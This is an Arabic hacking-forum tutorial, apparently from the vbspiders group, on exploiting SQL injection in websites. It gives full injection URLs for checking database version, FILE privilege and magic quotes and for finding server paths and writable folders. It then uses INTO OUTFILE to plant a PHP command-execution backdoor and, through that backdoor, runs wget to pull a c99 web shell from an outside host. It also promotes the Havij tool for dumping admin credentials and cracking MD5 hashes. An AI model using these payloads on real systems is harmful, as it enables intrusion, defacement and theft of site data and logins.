"اهلا وسهلا بكم اعضاء شبكة العناكب الاحترافية" اليوم موضعي ماتفعل بعد ماتجد موقع مصاب بلــثغرات :: SQL In Jection:: طبعا كثرت ثغرات الحقن وكثرت أنواعها اليوم حبيت ان انزل موضوع جديد بسبب قلة نشاطي في هذة الايام والسبب معروف هو المدرسة وحبيت ان يستفاد المتدى وحتى المتوسط من هذا الوضوع وبدون مقدمة طوية نبدأ بالموضوع..’ في البداية سوف ينقسم الموضوع الى : أ-الاختراق العادي والحقن عن طريق الاومر ب-الاختراق العادي والحقن عن طريق البرامج ج-الاختراق المتقدم والوصول الى نقاط الضعف في البرنامج ورفع سكريب خبيث علية 1-ماتحتاج من أجل هذة الخطوة اولا :يجب ان يوجد لديك تصريح شرح تصريح التعامل مع الملفات FILE privilege ثانيا : لمعرفه هل الماجيك كوتس of &on ثالثا : طرق لمعرفة المسارات تبع السيرفر او جلب الاخطاء الداله على المسارات عشان نقدر نحقن رابعا : طرق معرفه المجلدات المصرحه 2- بدأ الاستغلال وتلغيم الموقع ورفع الشل بسم الله ونتوكل على الله , أ-الاختراق العادي والحقن عن طريق الاومر في البداية الحقن العادي يتم فية اخذ الموقع المصاب وتبدأ انتة تحقن وطبعا الحقن وطبق الأومر الخاصة بلقاعدة المصابة بلسكريب المنصب على الموقع طيب احنة في منتدى دورة خاصة لثغرات sql وهذا الرابط الدورة . كود PHP:
http://vbspiders.com/vb/forumdisplay.php?f=236
</b>
ب-الاختراق العادي والحقن عن طريق البرامج يتم هنا الاختراق الموقع المصاب بلثغرات الحقن عن طريق برامج والحقيقة البرامج جميلة وقوية بنفس الوقت وانة دائما اعتمد عليها طبعا لان لحقن باليد متعب لكن يجب ان تتعلم ماهية دينامكية الاختراق عن طريق ثغرات sql نبدأ بأقوى برنامج هو برنامج havij 1.14 كود PHP:
http://itsecteam.com/en/projects/project1_page2.htm
</b>
لتحميل البرنامج اضغطو على Havij v1.14 Free طيب شرح البرنامج في هذا الفديوا : * فحص الموقع اذا هو مصاب او لا * استخراج الجداول واختيار الجدول الهدف [ الادمن او اليوزر ] على حسب النتائج * استخراج اعمدة الجدول الهدف * استخراج بيانات العمود الهدف * فك الباسوورد المشفر بمقياس MD5 * استخراج مسار لوحة تحكم الادمن * دخول لوحة التحكم كود PHP:
http://www.mediafire.com/?776x2axz39pku8l
</b>
ج-الاختراق المتقدم والوصول الى نقاط الضعف في البرنامج ورفع سكريب خبيث علية في هذة المرحلة سوف يتم الى رفع الشل عن طريق ثغرات sql وطبعا هون لازم تستخدم عقلك شوية وتنتبة لان هذة المرحلة جميلة جدا وقوى حيث مواقع المصاب بلثغرات الحقن كثير اكثر من شعر راسي ولازم تستخدم عقلك في الوصول الى نقاط ضعفها ورفع شل . يوجد اثنين من التعليمات اسمهما into outfile & into dumpfile في هذا التعليمين السابقتان في لغة القواعد لحفظ محتوى جدول داخل ملف وكلتا التعليمتان تؤدي نفس الغرض بمعنى ايهما استخدمت بتقضى حاجتك وعن طريقها نقدر نحقن كود ملغم بثغره او مركز رفع صغير او نعدل بيانات.. 1-ماتحتاج من أجل هذة الخطوة سوف يبدأ العمل ألجد ونبدأ الاستغلال الثغرات طبعا الاستغلال الحقيقي ... وبجب ان تنبة في هذة الخطوات .. طلعا الخطوات راح نبدأ بها ونشرحها واحدة وحدة والخطوات هي / 1- لديك تصريح للتعامل مع الملفات 2- معرفة هل الماجك كوتس اوف ام أون 3- معرفة مسارك على السيرفر 4- معرفة مجلد مصرح بلتصريح 777 5- بدأ الاستغلال وتلغيم ورفع الشل اولا :يجب ان يوجد لديك تصريح شرح تصريح التعامل مع الملفات FILE privilege طيب شو هذا التصريح ! هذا FILE privilege يعني تصريح التعامل مع الملفات من خلال القواعد او ملف الامتياز لمستخدم القاعده و اذا كنت تملك هذا التصريح يعني انك تملك كتابه ملفات ولديك ملف امتياز وبا التالي تحقن شل او كود كيف نعرف ان لدينا هذا التصريح ؟ اولا نعرف اصدار القاعدة عن طريق أمر </b>
كود PHP:
http://virus.com/vq.php?id=-10+union+select+1,version(),3,4,5,6,7,8,9--
</b>
المواقع لي تستخدم قاعدة بيانات الاصدار mysql 5 يوجد جدول اسمه user_privileges العمود is_grantable وفي هذا الجدول تجد نشوف هل هل لدينا صلاحيه او اذن لحقن شل او كتابة ملف بستخدام هذا العامود كافة الامتيازات للمستخدم القاعده او نقدر نقول ان في هذا الجدول كافة الصلاحيات للمستخدم القاعده لذلك نستخدم الامر التالي لمعرفة ان لدينا هذا التصريح , كود PHP:
http://virus.com/vq.php?id=-10+union+select+1,is_grantable,3,4,5,6,7,8,9+from+information_schema.user_privileges--
is_grantable ( في حال نبي نحقن كود لازم يكون نعم اي مسموح لي با الكتابه امتيازات المستخدم وهو يعني هل لديك grantee وهو يعني اسم مستخدم قاعدة البيانات privilege_type تحديدا وهو يعني المسموح لك كمستخدم للقاعده ماهو طيب اذا طلع لنا YES اذان لدينا هذا التصريح يعني نقدر نحقن كود ان شاء الله ونمتلك امتيازات المستخدم للكتابه ........ طيب في الاصدار الرابع mysql 4 كيف اعرف ان لدي امتيازات لمستخدم القاعده او كيف اعرف انه استطيع ان احقن شل او اكتب كود نجرب نعمل نفس الطريقه با الاصدار الخامس على الاصدار الرابع لكن بشكل مختلف اول شي عامود ملف الامتياز في الاصدار 4 file_priv يعني هل لديك صلاحيه او اذن لكتابه file_priv وراح يكون يا نعم او لا اي تملك التصاريح او لا تملك او تملك الامتياز او لا تملك او يمكنك كتابه كود او لا يمكنك نشوف كود PHP:
http://www.virus.com/vq.php?id=-10+union+select+1,2,file_priv,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
</b>
اذا طلع لنا Y يعني نقدر نحقن او نكتب كود ثانيا : لمعرفه هل الماجيك كوتس of &on يوجد لدينا طريقتين الطريقه الاولى عن طريق دالة : load_file('/') مثال كود PHP:
http://www.virus.com/vq.php?id=2+union+select+1,load_file('/') ,3,4,5,6,7--
</b>
لو اعطى خطا يعني اون لو ما اعطى يعني اوف الطريقه الثانيه '1'='1'-- لو طلع خطا او وجت في الصفحه التالي \'1\'=\'1\' هذا يعني الماجيك اون لو ما طلع لي مثل اللرمز فوق يعني اوف مثال كود PHP:
http://www.virus.com/vq.php?story=2 '1'='1'--
</b>
ثالثا : طرق لمعرفة المسارات تبع السيرفر او جلب الاخطاء الداله على المسارات عشان نقدر نحقن طبعا لازم نعرف المسار لي احنة فية لازم حتى نشوف مجلد مصرح مشان نقدر نحقن او نكتب ملف خبيث لديك عدة طرق اولا نحاول نطلع اخطاء المهم انت وطريتقك تحاول تجيب مسارات او اخطاء وايظا يمديك تروح تضع الموقع في قوقل وتحاول تطلع اخطاء ومسارات يوجد طرقة لمعرف المسار في الأصدار الخامس نستخدم @@datadir او نجرب نطلع اخطا جرب التالي 0***8242; AND 1=’0 ماطلع مسار or '1'='1' ايظا ما راح يطلع يعني تجرب وتحاول تعرف المسارات او نروح قوقل مثلا نشوف الاخطاء site:virus.com رابعا : طرق معرفه المجلدات المصرحه باقي علينا نجيب مجلدات مصرحه 777 عشان نقدر نحقن يوجد عدة طرق لاكن راح اذكر الطرق المهمة والقوية وانتة جرب بعد واستخدم عقلك وطرقك في الاختراق .. أولا لدي هذا المجدات لي وجدتها وان شاء الله تفيدكم ويتكون على الاغلب مصرحة بـــ 777 http://virus.com/templates_compiled/ http://virus.com/templates_c/ http://virus.com/templates/ http://virus.com/temporary/ http://virus.com/images/ http://virus.com/temp/ http://virus.com/files/ ثانيا يوجد برنامج IntelliTamper في هذا البرنامج تستطيع اظهار جميع المجدات في السيرفر ولة شروحات كثيرة في النت في طرق كثيرة ايظا جرب وتشوف وأبحث ولاتكون كسول ’ .......... وتجرب تحقن على المجلدات حتى يضبط معك واحد مصرح 777 كيف اعرف انه مصرح هذا بتعرفه لمن بيحقن معك الكود فقط اذا لم يحقن يعني مش مصرح او احيان بيطلع لك كتابه بتقول لك Can't create/write to file 2- بدأ الاستغلال وتلغيم الموقع ورفع الشل طيب لي فهمنا لي فوق يجب ان يكون لديك / 1-يجب ان يكون لديك اذن او صلاحيه كمستخدم للقاعده للكتابه 2-يجب ان يكون الماجيك كوتس اوف 3-يجب ان تعرف المسارات حتى تقدر تحقن او تقرى ملفات 4-يجب ان يكون لديك مجلدات مصرحه777 الان نستخدم الامر التالي اذا كانت جميع الخيارات لي فوق صحيح وشغالة . نحاول نلغم بكود بي اتش بي فيه ثغره كوماند او اي ثغره اخرى كود PHP:
<?system($_get***91;"vq"***93;);?>
</b>
المتغير المصاب هو vqhackers كود PHP:
http://www.virus.com/vq.php/id=-10+union+select+1,2,3,'<?system($_GET***91;"vq"***93;);?>',5,6,+into+outfile+'/home/virus/public_html/hacker/vbspiders.php
'/* طيب لي فوق نأتي ونحلل / كود PHP:
http://www.virus.com/vq.php/id=-10
</b>
الموقع المصاب كود PHP:
,'<?system($_GET***91;"vq"***93;);?>',
</b>
الكود لتلغيم بثغراة تنفيذ الاومر cmd كود PHP:
,+into+outfile+'/home/virus/public_html/hacker/vbspiders.php'/*
</b>
أمر لكتابة على ملف vbspiders.php الموجود في المسار التالي ... مع العلم ان مجلد hackers مصرح بتصريح 777 طيب الان نذهب الى ملف المصاب لي تم تلغيمة . www.virus.com/hackers/vbspiders.php?vq=wget www.vbspiders.com/shell/c99.txt?;mv special.txt dd.php ونفذ هذا الامر وشرح الامر. كود PHP:
www.virus.com/hackers/vbspiders.php?vq=
</b>
مسار الملف المصاب بثغرات الكومند مع الدالة "vq" كود PHP:
wget www.vbspiders.com/shell/c99.txt
</b>
أمر يقوم بسحب الملف الشل من أحد المواقع المرفوع عليها شل بصيغة نص كود PHP:
mv c99.txt hih.php
</b>
امر تحويل الشل من صيغة txt >>> php مع مراعة تغير اسمة الى hih.php ونفتح الشل لي رفع ويكون ع هذا المسار كود PHP:
www.virus.com/hackers/hih.php
ويفتح معاك الشل بأذن الله وهذا شرح لكيفية رفع الشل عن طريق هذة الثغرات . كود PHP:
http://www.4shared.com/file/61186587/bfd39abe/into_outfile_by_hussin_X.html
</b>
الحقوق / :rules: ViRuS Qalaa VBspiders TeaM في أمان الله أهداء الموضوع الى / Cyber Code - Dr.NaNo - HaCkEr'S KiNg مجروح هكر والى جميع الاعضاء شبكة العناكب ونلتقي دائما في مواضيع جديدة SEE U
]gdJJJg hglojvr: lhjtug fu] luJJJvtm Fl,ruD lwhf feyJJJvhj ::SQL Injection::